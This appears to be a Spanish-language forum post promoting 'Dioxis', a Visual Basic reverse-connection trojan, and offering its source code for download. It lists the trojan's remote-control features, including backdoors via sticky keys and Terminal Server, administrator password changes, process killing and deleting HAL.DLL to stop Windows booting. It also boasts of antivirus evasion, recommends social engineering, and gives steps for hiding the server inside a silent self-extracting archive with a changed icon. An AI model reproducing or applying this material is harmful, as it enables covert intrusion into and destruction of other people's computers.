Abstenganse Virustotal
Tamaño servidor: 408 KB (Compilado con Winsck.ocx & dioxis.exe(servidor))
Tamaño Cliente: 544 KB
Archivos: Cliente Dioxis y libreria winsck.ocx
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: 666
Infraestructura: Red Local e internet
Funciones automatizadas:
Ejecucion de:
- Paint
- Teclado Universal
- Buscaminas
- Solitario
- Pinball
- Calculadora
- Paseo de Win Xp
- Star Wars
- Mensajes personalizados
- Paginas Web
Matanza de Procesos:
- Messenger
- Navegadores (Firefox,Iexplorer,Safari y Opera)
- Explorador de Windows
- Proceso Personalizado
Creacion de Puertas Traseras:
- Habilitar terminal server
- Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
- Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)
Sistema:
- Edicion de la contraseña de administracion a la que se quiera
- Cierre de Sesion
- Apagar Pc
- ELIMINAR HAL.DLL (No se iniciara windows si no es reparado :/ )
¿Que es Dioxis?
Dioxis, a pesar de su simple interfaz, es un troyano de conexion inversa.
Utiliza la funcion shell, para ejecutar acciones, estas acciones estan divididas en 4 partes:
Modo Custom: Es el modo personalizado, si tienes ya conocimientos de lo que puedes hacer con "Ejecutar:" puedes escribir tus ordenes aqui para que sean procesadas en el ordenador remoto
Modo Funny: Es el modo divetido ^^. Puedes haces acciones tales como ejecutar paint, mandar mensajes, ponerle la tipica pelicula de star wars en modo ascii...etc
Modo Normal: Este modo esta dedicado a la matanza de procesos que corren en el pc remoto y a abrir paginas web o cerrar sesion, un poco mas cruel que el funny mod
Modo Dioxis: El dioxis mod, seria en teoria la forma mas cruel de usar este software, consta ge generar backdoors, apagar el pc, eliminar el hal.dll...etc
He evitado en este modo hacer las cosas crueles ya que este software aun no es detectado ^^ abstenganse gente cruel
Demostracion
Aqui os dejo unos minutos de la demostracion del troyano, es la 1 version, no la actualizada, pero no cambia mucho
¿Detectado?
El unico antivirus que hasta ahora me ha dado algun problema es el poco conocido avira, que lo detecta por heuristica pero te deja seguir trabajando con el, asi que si tienes una buena ingenieria social, podras colarselo, a continuacion los antivirus pasados:
Kapersky 2009
Nod32
Norton 2009
Panda global protection 2009
Avast
En este no tengo imagen, ya que nada mas analizarlo la ventana se cierra
Nod32
Norton 2009
Panda global protection 2009
Avast
En este no tengo imagen, ya que nada mas analizarlo la ventana se cierra
Por ahora esos antivirus son con los que lo analize, si deseais que lo analize con otros me comentais
Otros Datos:
- Añadida la funcion de eliminar Servidor y crearlo con el cliente
- Ahora el tiempo de reconexion se configura al crear el server, igual que la ip
- No hará falta conectarse y desconectarse al pasar entre modos[/b]
Instrucciones:
El Troyano consta de cliente y servidor, el servidor se crea con el cliente, y puede que necesite de la libreria de winsock (viene adjuntada con el software), asi que una vez creado el server seguid estos pasos:
1: Instalar el WINRAR y coged los archivos servidor y la libreria
2: Una vez tenemos el servidor y la libreria, cogemos los dos y con el winrar y le damos a añadir archivo, nos aparecera una ventana asi:
Le dais a crear archivo ejecutable o en mi caso a create sfx archive, el metodo de compresion que sea el mejor
3: A continuacion vete a la pestaña avanzado, te aparecerá esta ventana:
te vas a opciones de autoejecutable o sfx options
4: Te volvera a salir otra pestaña para poder decir el directorio en donde se instalara, y que se ejcutara antes o despues de la extraccion, rellenar segun la imagen
5: En la pestaña modos, selecciona segun la imagen, sobreescribir archivos y esconder todo
6: En esta pestaña podreis cambiar el icono de la aplicacion, luego das a aceptar todo y ya tendreis vuestro server
Descargar codigo fuente